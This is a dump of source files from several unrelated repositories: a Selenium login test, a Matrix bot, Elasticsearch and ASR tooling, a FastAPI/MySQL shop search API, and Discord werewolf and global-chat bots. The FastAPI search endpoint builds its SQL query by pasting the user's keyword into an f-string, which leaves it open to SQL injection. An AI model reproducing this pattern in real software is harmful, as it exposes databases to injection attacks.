#### File: PHL-Automated-UI-Test/Tests/SmokeTest_Login.py ```python import unittest import time from selenium import webdriver class SmokeTest_Login(unittest.TestCase): def setUp(self): self.driver = webdriver.Chrome() def tearDown(self): self.driver.close() def test_login_as_Administrator(self): driver = self.driver driver.get("http://phl.kaitohh.com/login.html") time.sleep(5) UsernameEdit = driver.find_element_by_xpath("/html/body/div/div[2]/div[1]/input") UsernameEdit.text = "Admin" PasswordEdit = driver.find_element_by_xpath("/html/body/div/div[2]/div[2]/input") PasswordEdit.send_keys("<PASSWORD>") SignInButton = driver.find_element_by_xpath("//*[@id=\"loginBTN\"]") SignInButton.click() # Assertion # should be logged in as administrator def test_login_as_User(self): driver = self.driver driver.get("http://phl.kaitohh.com/login.html") time.sleep(5) UsernameEdit = driver.find_element_by_xpath("/html/body/div/div[2]/div[1]/input") UsernameEdit.text = "User" PasswordEdit = driver.find_element_by_xpath("/html/body/div/div[2]/div[2]/input") PasswordEdit.send_keys("<PASSWORD>") SignInButton = driver.find_element_by_xpath("//*[@id=\"loginBTN\"]") SignInButton.click() # Assertion # should be logged in as User ```
{ "source": "8go/tiny-matrix-bot", "score": 2 }
#### File: 8go/tiny-matrix-bot/tiny-matrix-bot.py ```python import os import re import sys import logging import traceback import argparse import subprocess import configparser from time import sleep from matrix_client.client import MatrixClient class TinyMatrixtBot(): """This class implements a tiny Matrix bot. It also can be used to send messages from the CLI as proxy for the bot. """ def __init__(self, pargs): root_path = os.path.dirname(os.path.realpath(__file__)) self.config = configparser.ConfigParser() if "CONFIG" in os.environ: config_path = os.environ["CONFIG"] else: config_path = os.path.join(root_path, "tiny-matrix-bot.cfg") self.config.read(config_path) self.base_url = self.config.get("tiny-matrix-bot", "base_url") self.token = self.config.get("tiny-matrix-bot", "token") self.connect() logger.debug("arguments {}".format(pargs)) logger.debug("client rooms {}".format(self.client.rooms)) if pargs.room: if pargs.room not in self.client.rooms: logger.info( "Provided room argument is not in client rooms. Exiting ...") sys.exit(1) if pargs.message: text = pargs.message logger.debug("Provided message argument \"{}\".".format(text)) else: text = sys.stdin.read() # read message from stdin logger.debug("sending message to {}".format(pargs.room)) if pargs.code: logger.debug("sending message in format {}".format("code")) self.client.rooms[pargs.room].send_html( "<pre><code>" + text + "</code></pre>") elif pargs.html: logger.debug("sending message in format {}".format("html")) self.client.rooms[pargs.room].send_html(text) else: logger.debug("sending message in format {}".format("text")) self.client.rooms[pargs.room].send_text(text) logger.debug("message sent, now exiting") sys.exit(0) run_path = self.config.get( "tiny-matrix-bot", "run_path", fallback=os.path.join(root_path, "run")) os.chdir(run_path) scripts_path = self.config.get( "tiny-matrix-bot", "scripts_path", fallback=os.path.join(root_path, "scripts")) enabled_scripts = self.config.get( "tiny-matrix-bot", "enabled_scripts", fallback=None) self.scripts = self.load_scripts(scripts_path, enabled_scripts) self.inviter = self.config.get( "tiny-matrix-bot", "inviter", fallback=None) self.client.add_invite_listener(self.on_invite) self.client.add_leave_listener(self.on_leave) for room_id in self.client.rooms: self.join_room(room_id) self.client.start_listener_thread( exception_handler=lambda e: self.connect()) while True: sleep(0.5) def connect(self): try: # downgraded this from info to debug, because if this program is used by other # automated scripts for sending messages then this extra output is # undesirable logger.debug("connecting to {}".format(self.base_url)) self.client = MatrixClient(self.base_url, token=self.token) # same here, downgrade from info to debug, to avoid output for normal use # cases in other automated scripts logger.debug("connection established") except Exception: logger.warning( "connection to {} failed".format(self.base_url) + ", retrying in 5 seconds...") sleep(5) self.connect() def load_scripts(self, path, enabled): scripts = [] for script_name in os.listdir(path): script_path = os.path.join(path, script_name) if enabled: if script_name not in enabled: logger.debug( "script {} is not enabled".format(script_name)) continue if (not os.access(script_path, os.R_OK) or not os.access(script_path, os.X_OK)): logger.debug("script {} is not executable".format(script_name)) continue # the .copy() is extremely important, leaving it out is a major bug # as variables from the config file will then be constantly # overwritten! script_env = os.environ.copy() script_env["CONFIG"] = "1" logger.debug("script {} with script_env {}".format( script_name, script_env)) script_regex = subprocess.Popen( [script_path], env=script_env, stdout=subprocess.PIPE, universal_newlines=True ).communicate()[0].strip() if not script_regex: logger.debug("script {} has no regex".format(script_name)) continue del script_env["CONFIG"] if self.config.has_section(script_name): for key, value in self.config.items(script_name): script_env["__" + key] = value logger.debug( "add key-value pair key {} to script_env".format(key)) logger.debug( "add key-value pair value {} to script_env".format(value)) script = { "name": script_name, "path": script_path, "regex": script_regex, "env": script_env } scripts.append(script) logger.info("script {}".format(script["name"])) logger.debug("all scripts {}".format(scripts)) return scripts def on_invite(self, room_id, state): sender = "someone" for event in state["events"]: if event["type"] != "m.room.join_rules": continue sender = event["sender"] break logger.info("invited to {} by {}".format(room_id, sender)) if self.inviter: if not re.search(self.inviter, sender): logger.info( "{} is not inviter, ignoring invite" .format(sender)) return self.join_room(room_id) def join_room(self, room_id): logger.info("join {}".format(room_id)) room = self.client.join_room(room_id) room.add_listener(self.on_room_event) def on_leave(self, room_id, state): sender = "someone" for event in state["timeline"]["events"]: if not event["membership"]: continue sender = event["sender"] logger.info("kicked from {} by {}".format(room_id, sender)) def on_room_event(self, room, event): if event["sender"] == self.client.user_id: logger.debug( "event from sender (itself) {}".format(event["sender"])) return # ignore encrypted messages, but log them in debug mode if event["type"] == "m.room.encrypted": logger.debug( "event type (m.room.encrypted) {}".format(event["type"])) logger.debug("sender_key (m.content.sender_key) {}".format( event["content"]["sender_key"])) logger.debug("ciphertext (m.content.ciphertext) {}".format( event["content"]["ciphertext"])) return if event["type"] != "m.room.message": logger.debug( "event of type (!=room.message) {}".format(event["type"])) return # only plain text messages are processed, everything else is ignored if event["content"]["msgtype"] != "m.text": logger.debug("event of msgtype (!=m.text) {}".format( event["content"]["msgtype"])) return args = event["content"]["body"].strip() logger.debug("args {}".format(args)) for script in self.scripts: # multiple scripts can match regex, multiple scripts can be kicked # off if not re.search(script["regex"], args, re.IGNORECASE): continue self.run_script(room, event, script, args) def run_script(self, room, event, script, args): script["env"]["__room_id"] = event["room_id"] script["env"]["__sender"] = event["sender"] if "__whitelist" in script["env"]: if not re.search(script["env"]["__whitelist"], event["room_id"] + event["sender"]): logger.debug( "script {} not whitelisted".format(script["name"])) return if "__blacklist" in script["env"]: if re.search(script["env"]["__blacklist"], event["room_id"] + event["sender"]): logger.debug("script {} blacklisted".format(script["name"])) return logger.debug("script {} run with env {}".format( [script["name"], args], script["env"])) run = subprocess.Popen( [script["path"], args], env=script["env"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True ) # output = run.communicate()[0].strip() output, std_err = run.communicate() output = output.strip() std_err = std_err.strip() if run.returncode != 0: logger.debug("script {} exited with return code {} and " + "stderr as \"{}\" and stdout as \"{}\"".format( script["name"], run.returncode, std_err, output)) output = "*** Error: script " + script["name"] + " returned error code " + str( run.returncode) + ". ***\n" + std_err + "\n" + output # return # don't return on error, also print any available output sleep(0.1) # higher up programs or scripts have two options: # Text with a single or a double linebreak (i.e. one empty line) stays together # in a single messages, allowing one to write longer messages and structure # them clearly with separating whitespace (an empty line). # When two empty lines are found, the text is split up in multiple messages. # That allows a single call to a script to generate multiple independent messages. # In short, everything with 1 or 2 linebreaks stays together, wherever there are 3 # linebreaks the text is split into 2 or multiple messages. for p in output.split("\n\n\n"): for line in p.split("\n"): logger.debug( "script {} output {}".format( script["name"], line)) # strip again to get get rid of leading/trailing newlines and whitespaces # left over from previous split if p.strip() != "": if pargs.code: room.send_html("<pre><code>" + p.strip() + "</code></pre>") elif ("__format" in script["env"]) and (script["env"]["__format"] == "code"): room.send_html("<pre><code>" + p.strip() + "</code></pre>") elif pargs.html: room.send_html(p.strip()) elif ("__format" in script["env"]) and (script["env"]["__format"] == "html"): room.send_html(p.strip()) else: room.send_text(p.strip()) sleep(0.1) if __name__ == "__main__": logging.basicConfig() # initialize root logger, a must if "DEBUG" in os.environ: logging.getLogger().setLevel(logging.DEBUG) # set log level on root logger else: logging.getLogger().setLevel(logging.INFO) # set log level on root logger # Construct the argument parser ap = argparse.ArgumentParser( description="This program implements a simple Matrix bot.") # Add the arguments to the parser ap.add_argument("-d", "--debug", required=False, action="store_true", help="Print debug information") ap.add_argument("-r", "--room", required=False, help="Don't run bot. Just send a message to this bot-room. If --message is provided use that as message, if not provided read message from stdin.") ap.add_argument("-m", "--message", required=False, help="Don't run bot. Just send this message to the specified bot-room. If not specified, message will be read from stdin.") # -h already used for --help, -w for "web" ap.add_argument("-w", "--html", required=False, action="store_true", help="Send message(s) as format \"HTML\". If not specified, message will be sent as format \"TEXT\".") ap.add_argument("-c", "--code", required=False, action="store_true", help="Send message(s) as format \"CODE\". If not specified, message will be sent as format \"TEXT\". If both --html and --code are specified then --code takes priority.") pargs = ap.parse_args() if pargs.debug: logging.getLogger().setLevel(logging.DEBUG) # set log level on root logger logging.getLogger().info("Debug is turned on.") logger = logging.getLogger("tiny-matrix-bot") if pargs.message and (not pargs.room): logger.error( "If you provide a message you must also provide a room as destination for the message.") sys.exit(2) try: TinyMatrixtBot(pargs) except Exception: traceback.print_exc(file=sys.stdout) sys.exit(1) except KeyboardInterrupt: sys.exit(1) ```
{ "source": "8hk/AEK", "score": 3 }
#### File: AEK/annotator_tool/import_articles_to_elasticsearch.py ```python import json import os import uuid from datetime import datetime from elasticsearch import Elasticsearch, helpers from pymongo import MongoClient import nltk client = MongoClient( host=os.environ.get("MONGO_DB_HOST", " ") + ":" + os.environ.get("MONGO_DB_PORT", " "), # <-- IP and port go here serverSelectionTimeoutMS=3000, # 3 second timeout username=os.environ.get("MONGO_DB_USERNAME", " "), password=os.environ.get("MONGO_DB_PASSWORD", " "), ) db = client[os.environ.get("MONGO_INITDB_DATABASE", " ")] class ElasticSearchHandler(object): def __init__(self): self.already_inserted_detailed_article_id_list = [] self.annotation_detail_column = db["annotated_article_ids"] self.get_detailed_article_ids_from_db() print("total ",len(self.already_inserted_detailed_article_id_list),"articles will be processed") self.start_importing() def bulk_json_data(self,json_list, _index, doc_type): for json in json_list: if '{"index"' not in json: yield { "_index": _index, "_type": doc_type, "_id": uuid.uuid4(), "_source": json } def get_detailed_article_ids_from_db(self): query = {} column = db["annotated_article_ids"] document = column.find(query) for x in document: list_item = dict(x) if list_item["id"] not in self.already_inserted_detailed_article_id_list: self.already_inserted_detailed_article_id_list.append(list_item["id"]) def article_details_query(self, article_id): mongo_query = {} mongo_query["id"] = article_id document = self.annotation_detail_column.find(mongo_query) for x in document: list_item = dict(x) article_json = { "authors": list_item["author_list"], "keywords": list_item["top_three_keywords"], "abstract": list_item["abstract"].lower(), "article_date": list_item["article_date"], "article_id": list_item["id"], "_created": datetime.now() } del document del list_item return article_json def start_importing(self): article_json = [] elastic = Elasticsearch(hosts=["es01"]) while self.already_inserted_detailed_article_id_list: article_json.append(self.article_details_query(self.already_inserted_detailed_article_id_list.pop())) response =helpers.bulk(elastic, self.bulk_json_data(article_json, "test5", "doc")) print("\nRESPONSE:", response) print("op finished") if __name__ == "__main__": now = datetime.now() start_time = now.strftime("%H:%M:%S") print("op started") handler=ElasticSearchHandler() finish_time = now.strftime("%H:%M:%S") print("start time: ", start_time) print("finish time: ", finish_time) ``` #### File: api/search/models.py ```python from djongo import models class AnnotatedArticle(models.Model): body_value = models.CharField(max_length=255) target = models.CharField(max_length=255,null=True) def __str__(self): return str(self.body_value) @property def sd(self): return{ "@type": 'Annotation', "body": { "type": "Choice", "items": self.body_value } } # # """ # { # "@context": "http://www.w3.org/ns/anno.jsonld", # "id": <annotation id (incremental)>, # "type": "Annotation", # "body": [ # { # "type": "Choice", # "source": "<ontology + concept id>" , # "items": [ # { # "type": "TextualBody", # "value": "<synonym>" # ontology concept label # }, # { # "type": "TextualBody", # "value": "<synonym>" # synonym 1 # }, # { # "type": "TextualBody", # "value": "<synonym>" # synonym 2 # }, # { # "type": "TextualBody", # "value": "<synonym>" # synonym n # } # ] # } # } # ], # "target": { # "id": "<internal article id>", # "selector: { # "type:": "TextPositionSelector", # "start": <start position in article>, # "end": <end position in article> # } # } # } # """ ``` #### File: AEK/api/views.py ```python from django.http import HttpResponse from django.shortcuts import render from api.search import views import requests # Create your views here. def aboutPage(request): dict={} annotated_article_number = views.findArticleNumber() dict["article_number"]=annotated_article_number annotation_number= views.findAnnotationNumber() dict["annotation_number"]=annotation_number return render(request, 'html/about.html',{'metrics_data': dict}) ```
{ "source": "8igfive/MyASR", "score": 3 }
#### File: MyASR/tools/make_segments_wavscp.py ```python import os import random def make_segments_wav_scp(src_scp_path, segments_path, dst_scp_path): with open(src_scp_path, 'r', encoding='utf8') as fin: wavkey2path = dict( map( lambda x: x.strip().split(), fin.readlines() ) ) with open(segments_path, 'r', encoding='utf8') as fin: scpsegments = list( map( lambda x: '{} {},{},{}'.format(x[0], wavkey2path[x[1]], x[2], x[3]), filter( lambda x: x[1] in wavkey2path, # segKey, wavKey, start, end map( lambda x: x.strip().split(), fin.readlines() ) ) ) ) with open(dst_scp_path, 'w', encoding='utf8') as fout: fout.write('\n'.join(scpsegments)) print('{} contain {} segments'.format(dst_scp_path, len(scpsegments))) print('segments are like: {}'.format(scpsegments[0])) def sample(src_path, dst_path, devide_factor=None, num=50000): with open(src_path, 'r', encoding='utf8') as fin: srclines = list(map(lambda x: x.strip(), fin.readlines())) if devide_factor: dst_size = len(srclines) // devide_factor else: dst_size = num random.shuffle(srclines) dstlines = srclines[:dst_size] print('srclines={}, dstlines={}'.format(len(srclines), len(dstlines))) # print(dstlines[:10]) with open(dst_path, 'w', encoding='utf8') as fout: fout.write('\n'.join(dstlines)) def count_lines(path): with open(path, 'r', encoding='utf8') as fin: lines = list(map(lambda x: x.strip(), fin.readlines())) # lines = fin.read().split('\n') print(lines[:3]) return len(lines) if __name__ == '__main__': # src_scp_path = '/home/LAB/qujy/open/wenet-main/examples/wenetspeech/s0/data/train_l/wav.scp' # segments_path = '/home/LAB/qujy/open/wenet-main/examples/wenetspeech/s0/data/train_l/segments' # dst_scp_path = 'egs/wenetspeech/data/train/wav.scp.segments' # make_segments_wav_scp(src_scp_path, segments_path, dst_scp_path) src_path = 'egs/wenetspeech/data/train/wav.scp.segments' dst_path = 'egs/wenetspeech/data/train/wav.scp.segments.sample_50000' sample(src_path, dst_path, num=50000) # count_lines(src_scp_path) # print(count_lines(dst_path)) ``` #### File: MyASR/tools/noise_reduction.py ```python import argparse from genericpath import exists import os import time import re from tqdm import tqdm import numpy as np from scipy.io import wavfile from wiener_scalart import wienerScalart TIME = time.strftime("%Y-%m-%d_%H:%M:%S", time.localtime()) CURRENT_DIR = os.path.dirname(os.path.abspath(__file__)) WORKPLACE_DIR = os.path.dirname(CURRENT_DIR) DUMP_DIR = os.path.join(WORKPLACE_DIR, os.path.join('dump', TIME)) DUMP_FEAT = 'feat_{}.scp'.format(TIME) DUMP_TEXT = 'text_{}'.format(TIME) FEAT_FORMAT = r'\s?(.+?)\s+(.+?\.wav)' intMap = {np.dtype('int8') : (0x7f, -0x80), np.dtype('int16') : (0x7fff, -0x8000), np.dtype('int32') : (0x7fffffff, -0x8000000), np.dtype('int64') : (0x7fffffffffffffff, -0x8000000000000000)} def noise_reduct(args, filePath, dumpPath): sampleRate, musicData = wavfile.read(filePath) dataType = np.dtype('int16') musicData.dtype = dataType # FIXME: wavfile 读取的结果数据类型可能有问题 if args.debug: print(min(musicData), max(musicData), intMap[dataType][0] + 1) if dataType in intMap: musicData = musicData / (intMap[dataType][0] + 1) if args.debug: print(min(musicData), max(musicData)) newData = wienerScalart(musicData, sampleRate) if dataType in intMap: if args.debug: print(min(newData), max(newData)) newData = newData * (intMap[dataType][0]) newData = newData.astype(dataType) if args.debug: print(max(newData), min(newData)) wavfile.write(dumpPath, sampleRate, newData) def main(args): if args.feat is None or args.text is None: print('lack of feat file or text file') return if os.path.abspath(args.dumpFeat) != args.dumpFeat: args.dumpFeat = os.path.join(DUMP_DIR, args.dumpFeat) if os.path.abspath(args.dumpText) != args.dumpText: args.dumpText = os.path.join(DUMP_DIR, args.dumpText) if not os.path.exists(DUMP_DIR): os.makedirs(DUMP_DIR) with open(args.feat, 'r', encoding='utf8') as f: dataPairs = re.findall(FEAT_FORMAT, f.read()) with open(args.dumpFeat, 'w', encoding='utf8') as f: for i in tqdm(range(len(dataPairs))): dataPair = dataPairs[i] pathList = os.path.split(dataPair[1]) dumpPath = os.path.join(args.dumpDir, pathList[-1]) f.write('{} {}\n'.format(dataPair[0], dumpPath)) noise_reduct(args, dataPair[1], dumpPath) with open(args.text, 'r', encoding='utf8') as fin: with open(args.dumpText, 'w', encoding='utf8') as fout: fout.write(fin.read()) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-f', '--feat', type=str, default=None, help='feat file path') parser.add_argument('-t', '--text', type=str, default=None, help='text file path') parser.add_argument('-dd', '--dumpDir', type=str, default=DUMP_DIR, help='the directory where holds new .wav files') parser.add_argument('-df', '--dumpFeat', type=str, default=os.path.join(DUMP_DIR, DUMP_FEAT), help='dump feat file path') parser.add_argument('-dt', '--dumpText', type=str, default=os.path.join(DUMP_DIR, DUMP_TEXT), help='dump text file path') parser.add_argument('-n', '--noiseLength', type=float, default=0.25, help='the noise time length at the beggining of the audio') parser.add_argument('-db', '--debug', action='store_true', help='print debug message') args = parser.parse_args() main(args) ```
{ "source": "8igMac/webminer", "score": 3 }
#### File: 8igMac/webminer/main.py ```python from fastapi import FastAPI from typing import Optional from enum import Enum import mysql.connector as database class Mysql: def __init__(self): db_conn_info = { 'user': 'michael', 'password': '<PASSWORD>', 'host': 'localhost', 'database': 'shop' } self.conn = database.connect(**db_conn_info) self.cur = self.conn.cursor() def add_data(self, name, rating, sales, price): try: statement = 'INSERT INTO items (name, rating, sales, price) VALUES (%s, %s, %s, %s)' data = (name, rating, sales, price) self.cur.execute(statement, data) self.conn.commit() #print('Sucessfully add data') # debug except database.Error as e: print(f'Error adding entry to database: {e}') def get_data(self, name): try: statement = f"SELECT * FROM items WHERE name LIKE '{name}%'" self.cur.execute(statement) return self.cur.fetchall() except database.Error as e: print(f'Error getting entry to database: {e}') def __del__(self): self.conn.close() print('Connection closed') app = FastAPI() mysql = Mysql() class SortOption(str, Enum): relevancy = 'relevancy' # Todo: define relevancy. time = 'time' sales = 'sales' price = 'price' class SortOrder(str, Enum): asc = 'asc' desc = 'desc' @app.get('/') async def read_main(): return {'msg': 'Hello, World'} @app.get('/search') async def search( keyword: str, sort_by: Optional[SortOption] = None, order: Optional[SortOrder] = None, ): result = mysql.get_data(keyword) return result # return { # 'operation': 'search', # 'keyword': keyword, # 'sort_by': sort_by, # 'order': order, # } ```
{ "source": "8infy/AWML", "score": 3 }
#### File: 8infy/AWML/dependency_downloader.py ```python import sys import os import urllib.request def error_exit(why): print(f"-- Failed to install OpenGL dependencies! Reason: {why}") sys.exit(1) if len(sys.argv) != 2: print("Usage: python dependency_downloader.py <project-include-path> \ \nPlease note that this script is meant to be executed with CMake and not manually!") sys.exit(1) if not os.path.isdir(sys.argv[1]): error_exit(f"no such directory: {sys.argv[1]}") try: print("-- Downloading OpenGL dependencies...") gl_path = os.path.join(sys.argv[1], "GL") khr_path = os.path.join(sys.argv[1], "KHR") os.mkdir(gl_path) os.mkdir(khr_path) urllib.request.urlretrieve("https://www.khronos.org/registry/OpenGL/api/GL/glcorearb.h", gl_path + "/glcorearb.h") urllib.request.urlretrieve("https://www.khronos.org/registry/OpenGL/api/GL/wglext.h", gl_path + "/wglext.h") urllib.request.urlretrieve("https://www.khronos.org/registry/EGL/api/KHR/khrplatform.h", khr_path + "/khrplatform.h") except Exception as ex: error_exit(ex) print("-- Successfully downloaded OpenGL dependencies.") ```
{ "source": "8ka1alu/heroku-global-py", "score": 2 }
#### File: heroku-global-py/cogs/gladd.py ```python import os import r from discord.ext import commands import discord class addglobal(commands.Cog): def __init__(self, bot): self.bot = bot @commands.command() @commands.has_permissions(manage_guild=True) async def add_global(self, ctx): """グローバルチャット登録""" cgi=ctx.guild.id cci=ctx.channel.id ccn=ctx.channel.name global_ch="gloch" conn=r.connect() k=conn.keys() gi=str(cgi) ci=str(cci) count=0 for i in k: #データベース判定 if i == gi: count+=1 if count==0: #データベース未登録時 a1=conn.sadd(cgi,cci) a2=conn.sadd(global_ch,cci) if a1==True and a2==True: embed = discord.Embed(title="**登録情報**", description=None,color=0x3498db) embed.add_field(name="登録完了", value=f"`登録チャンネル:{ccn}`") return await ctx.send(embed=embed) else: embed = discord.Embed(title="**登録情報**", description=None,color=0x992d22) embed.add_field(name="登録失敗", value=f"`開発者に問い合わせて下さい`") return await ctx.send(embed=embed) elif count>0: sm=conn.smembers(cgi) counts=0 for ch in sm: if ch == ci: counts+=1 if counts==0: a1=conn.sadd(cgi,cci) a2=conn.sadd(global_ch,cci) if a1==True and a2==True: embed = discord.Embed(title="**登録情報**", description=None,color=0x3498db) embed.add_field(name="登録完了", value=f"`登録チャンネル:{ccn}`") return await ctx.send(embed=embed) else: embed = discord.Embed(title="**登録情報**", description=None,color=0x992d22) embed.add_field(name="登録失敗", value=f"`開発者に問い合わせて下さい`") return await ctx.send(embed=embed) elif counts>0: embed = discord.Embed(title="**登録情報**", description=None,color=0x992d22) embed.add_field(name="既に登録されています。", value=f"`登録チャンネル:{ccn}`") return await ctx.send(embed=embed) else: embed = discord.Embed(title="**エラー**", description="開発者に問い合わせて下さい",color=0x992d22) return await ctx.send(embed=embed) def setup(bot): bot.add_cog(addglobal(bot)) ``` #### File: heroku-global-py/cogs/gldel.py ```python import os import r from discord.ext import commands import discord class delglobal(commands.Cog): def __init__(self, bot): self.bot = bot @commands.command() @commands.has_permissions(manage_guild=True) async def del_global(self, ctx): """グローバルチャット登録解消""" cgi=ctx.guild.id cci=ctx.channel.id ccn=ctx.channel.name global_ch="gloch" conn=r.connect() k=conn.keys() gi=str(cgi) ci=str(cci) count=0 for i in k: if i == gi: count+=1 if count==0: embed = discord.Embed(title="**エラー**", description="登録がされていない鯖です",color=0x992d22) return await ctx.send(embed=embed) elif count>0: sm=conn.smembers(cgi) counts=0 for ch in sm: if ch == ci: counts+=1 if counts==0: embed = discord.Embed(title="**エラー**", description="このチャンネルは登録されていません",color=0x992d22) return await ctx.send(embed=embed) elif counts>0: a1=conn.srem(cgi, cci) a2=conn.srem(global_ch, cci) if a1==True and a2==True: embed = discord.Embed(title="**登録解消情報**", description=None,color=0xe74c3c) embed.add_field(name="登録を解消しました", value=f"`登録チャンネル:{ccn}`") return await ctx.send(embed=embed) else: embed = discord.Embed(title="**エラー**", description="開発者に問い合わせて下さい`48`",color=0x992d22) return await ctx.send(embed=embed) else: embed = discord.Embed(title="**エラー**", description="開発者に問い合わせて下さい`51`",color=0x992d22) return await ctx.send(embed=embed) def setup(bot): bot.add_cog(delglobal(bot)) ``` #### File: 8ka1alu/heroku-global-py/discordbot.py ```python from discord.ext import commands, tasks # Bot Commands Frameworkをインポート import traceback # エラー表示のためにインポート import os import discord import r TOKEN = os.environ['DISCORD_BOT_TOKEN'] prefix = os.environ['DISCORD_BOT_PREFIX'] #プレフィックス # 読み込むコグの名前を格納しておく。 INITIAL_EXTENSIONS = [ 'cogs.eval', 'cogs.glchat', 'cogs.gladd', 'cogs.gldel' ] # クラスの定義。ClientのサブクラスであるBotクラスを継承。 class MyBot(commands.Bot): # MyBotのコンストラクタ。 def __init__(self, command_prefix, help_command): # スーパークラスのコンストラクタに値を渡して実行。 super().__init__(command_prefix,help_command) # INITIAL_COGSに格納されている名前から、コグを読み込む。 # エラーが発生した場合は、エラー内容を表示。 for cog in INITIAL_EXTENSIONS: try: self.load_extension(cog) except Exception: traceback.print_exc() # Botの準備完了時に呼び出されるイベント async def on_ready(self): print(self.user.name) # ボットの名前 print(self.user.id) # ボットのID print(discord.__version__) # discord.pyのバージョン print('----------------') print('Hello World !!') await self.change_presence(status=discord.Status.idle,activity=discord.Game(name=f'Ping:{self.ws.latency * 1000:.0f}ms')) conn=r.connect() ky=conn.keys() global_ch="gloch" count=0 for i in ky: i=str(i) if i == global_ch: count+=1 if count>0: smsd=conn.smembers(global_ch) count=0 for q in smsd: q=str(q) if q=="0": count+=1 if count>0: p=conn.srem(global_ch,"0") if p==True: print("正常起動") else: print("異常発生") else: print(ky) else: p=conn.sadd(global_ch,"0") if p==True: print("正常起動") else: print("異常発生") class JapaneseHelpCommand(commands.DefaultHelpCommand): def __init__(self): super().__init__() self.commands_heading = "コマンド:" self.no_category = "その他" self.command_attrs["help"] = "コマンド一覧と簡単な説明を表示" def get_ending_note(self): return (f"各コマンドの説明: {prefix}help <コマンド名>\n" f"各カテゴリの説明: {prefix}help <カテゴリ名>\n") #MyBotのインスタンス化及び起動処理。 if __name__ == '__main__': bot = MyBot(command_prefix=prefix,help_command=JapaneseHelpCommand()) # command_prefixはコマンドの最初の文字として使うもの。 e.g. !ping bot.run(TOKEN) # Botのトークン ```
{ "source": "8ka1alu/jinro-gm", "score": 3 }
#### File: jinro-gm/cogs/game.py ```python import os import r from discord.ext import commands import discord import random import asyncio class jgame(commands.Cog): def __init__(self, bot): self.bot = bot @commands.command() async def end(self, ctx): """強制終了""" conn=r.connect() kk=conn.smembers("開発管理者") k=[l for l in kk] cai=ctx.author.id cai=str(cai) if cai not in k: return await ctx.send("使用できません") d=conn.smembers("人狼参加者") dd=[j for j in d] if "0" not in dd: await ctx.send("強制終了します") ky=conn.keys() kys=[j for j in ky] for b in kys: if b in dd: du=conn.delete(b) pp=conn.sadd("人狼参加者","0") await ctx.send(pp) else: await ctx.send("現在使用できません") @commands.command() async def logout(self, ctx): """再起動""" conn=r.connect() kk=conn.smembers("開発管理者") k=[l for l in kk] cai=ctx.author.id cai=str(cai) if cai not in k: return await ctx.send("使用できません") await ctx.send('再起動します') await self.bot.change_presence(status=discord.Status.dnd,activity=discord.Game(name=f'再起動')) ky=conn.keys() js=conn.smembers("人狼参加者") jss=[f for f in js] kys=[j for j in ky] for b in kys: if b in jss: du=conn.delete(b) d=conn.delete("人狼参加者") await asyncio.sleep(5) p=conn.sadd("人狼参加者","0") await self.bot.logout() @commands.command() async def start(self, ctx): """開始""" conn=r.connect() kk=conn.smembers("開発管理者") k=[l for l in kk] cai=ctx.author.id cai=str(cai) if cai not in k: return await ctx.send("使用できません") d=conn.smembers("人狼参加者") dd=[j for j in d] if "0" not in dd: await ctx.send('現在使用できません') else: rp=conn.smembers("人狼役職") rpp=[j for j in rp] m=1 for i in rpp: dp=conn.get(i) m+=int(dp) if len(d)!=m: return await ctx.send("参加者もしくは役職が足りません") pp=conn.srem("人狼参加者","0") dd.remove("0") await ctx.send("ゲームを開始します") await asyncio.sleep(0.5) await ctx.send("0日目\n役職がDMに配布されます") for ro in rpp: qe=conn.get(ro) m=0 while m<int(qe): user=random.choice(dd) up=self.bot.get_user(int(user)) await up.send(f"貴方は**{ro}**です") p=conn.set(user,ro) dd.remove(up) m+=1 @commands.command() async def say(self, ctx, *, msg:int): await ctx.send(msg) await ctx.send(len(msg)) def setup(bot): bot.add_cog(jgame(bot)) ``` #### File: jinro-gm/cogs/roles.py ```python import os import r from discord.ext import commands import discord import asyncio class jrole(commands.Cog): def __init__(self, bot): self.bot = bot @commands.group() async def role(self, ctx): """役職関連""" conn=r.connect() # サブコマンドが指定されていない場合、メッセージを送信する。 if ctx.invoked_subcommand is None: jack=conn.smembers("人狼役職") jr=[j for j in jack] embed=discord.Embed(title="現在人狼役職",description=None) for i in jr: p=conn.get(i) embed.add_field(name=f'**{i}**',value=f'`{p}`') await ctx.send(embed=embed) @role.command() async def set(self, ctx, what=None, whats=None): conn=r.connect() kk=conn.smembers("開発管理者") k=[l for l in kk] cai=ctx.author.id cai=str(cai) if cai not in k: return await ctx.send("使用できません") rk=conn.smembers("人狼役職") kr=[l for l in rk] cai=what cai=str(cai) if cai not in kr: return await ctx.send("その役職はありません") if what==None: return await ctx.send("役職を指定して下さい") if whats==None: return await ctx.send("変更値を指定して下さい") rs=conn.set(what,whats) if rs ==True: embed=discord.Embed(title="役職変更成功",description=None) embed.add_field(name=f'**{what}**',value=f'`{whats}`') await ctx.send(embed=embed) else: embed=discord.Embed(title="役職変更失敗",description="`変更に失敗しました`") await ctx.send(embed=embed) @role.command() async def reset(self, ctx, what=None): conn=r.connect() kk=conn.smembers("開発管理者") k=[l for l in kk] cai=ctx.author.id cai=str(cai) if cai not in k: return await ctx.send("使用できません") if what==None: return await ctx.send("役職を指定して下さい") if what=="all": fl=[] rk=conn.smembers("人狼役職") kr=[l for l in rk] for i in kr: pp=conn.set(i,"0") if pp==False: fl.apped(i) embed=discord.Embed(title="全ての役職のリセットが完了しました\n--------------------",description="以下失敗した物") m=1 for f in fl: embed.add_field(name=f'**No.{m}**',value=f'`{f}`') await ctx.send(embed=embed) else: rk=conn.smembers("人狼役職") kr=[l for l in rk] cai=what cai=str(cai) if cai not in kr: return await ctx.send("その役職はありません") else: pp=conn.set(what,'0') if pp==True: embed=discord.Embed(title="役職変更成功",description=None) embed.add_field(name=f'**{what}**',value=f'`0`') await ctx.send(embed=embed) else: embed=discord.Embed(title="役職変更失敗",description="`変更に失敗しました`") await ctx.send(embed=embed) @role.group() async def temple(self, ctx): conn=r.connect() kk=conn.smembers("開発管理者") k=[l for l in kk] cai=ctx.author.id cai=str(cai) if cai not in k: return await ctx.send("使用できません") if ctx.invoked_subcommand is None: p=conn.smembers("人狼役職") p=[j for j in p] p='・'.join(p) embed=discord.Embed(title="現在設定可能役職",description=p) await ctx.send(embed=embed) @temple.command() async def add(self, ctx, whats=None): conn=r.connect() kk=conn.smembers("開発管理者") k=[l for l in kk] cai=ctx.author.id cai=str(cai) if cai not in k: return await ctx.send("使用できません") if whats==None: return await ctx.send("役職を指定して下さい") p=conn.sadd("人狼役職",whats) if p ==True: 